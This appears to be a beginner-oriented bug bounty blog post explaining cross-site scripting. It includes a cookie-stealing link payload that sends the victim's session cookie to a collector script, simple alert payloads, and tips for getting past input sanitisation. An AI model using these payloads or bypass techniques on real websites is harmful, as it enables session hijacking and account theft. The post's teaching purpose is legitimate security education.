Behind the Scene: XSS?
2021-06-13 21:57:03 Author: infosecwriteups.com(查看原文) 阅读量:103 收藏

Before we start let’s understand what actually XSS is ?

What the hack is XSS (Cross-Site-Scripting)?

XSS is a Client Side Code Injection attack. With that I mean, by embedding malicious code in a genuine web page, the attacker hopes to execute harmful scripts on the victim’s web browser.

I found this image to be helpful to understand the concept clearly. Have a look and try to understand what is actually happening?

Backend process of XSS

Functioning of XSS

Still have any doubt? No worries, at all let’s take a more deep dive with an example.

Example

1. Let’s say you are testing a site xyz.com and you found that, you can inject your script at any parameter/Vulnerable point.

2. Then you injected your script let’s say “<a onlcick document.location=”http://localhost/ethicalkaps/getcookies.php?cookie=’+escape(document.cookie); href=”https://ethicalkaps.com”>ClickHere</a>”. (This will basically steal the cookie from victim’s session )

3. That script went to web application and it manipulated the website code.

4. Now, when victim visits your link that you have created through href, then you will be able to fetch victim’s session cookie.

Simple Right? Yeah, indeed it is !! But what happens most of the time, the developer sanitizes the user input and because of that we are unable to inject our payload directly onto the website so we look for other ways to bypass the sanitization.

Few ways to bypass the restrictions :-

  1. Use Encoding for your payload. (For e.g. < can be encoded to %3C, ? as %3F%0A etc.)
  2. If your payload is reflecting on website and is not executing. Then View Page Source and see where your payload is getting stuck & according to that make changes to your payload.
  3. Sometime we miss XSS by our visuals, so for that don’t forget to try BLIND XSS. (I personally use XSS Hunter for that.)
  4. You can use Intruder attack if there is no rate limit on the parameter and inject the list of payloads.

I personally prefer :-

Reason being they keep updating their payload list on the regular basis.

These are some ways that you can’t forget to look out for. If you want to check more about how you can actually bypass the coding restrictions.

Visit :-

for some practical payload stuffs.

So Hackers, Now its time for you to decide whether Is it really just about finding out the “PARAMETERS” or “SEARCH” field and running these type of payloads? For e.g. “><script>alert(“Cyberpunks here”)</script> , “><svg/onload=alert(1)> etc. OR there is something more to it ?

Keep Digging and learning new stuffs. I will come back to you with another #BehindtheScene of some other vulnerability. Till then take care and Keep Hunting for good.

Found this post useful? Kindly tap the 👏 button below! :)

If you like the content then, you can support me over here :- @buymeacoffee.com/ethicalkaps

See you in the next Article. Until then Take care. Peace!

You can Follow me on Twitter, on Spotify to listen my writeups and on Instagram.


文章来源: https://infosecwriteups.com/behind-the-scene-xss-6a7ff5559b54?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh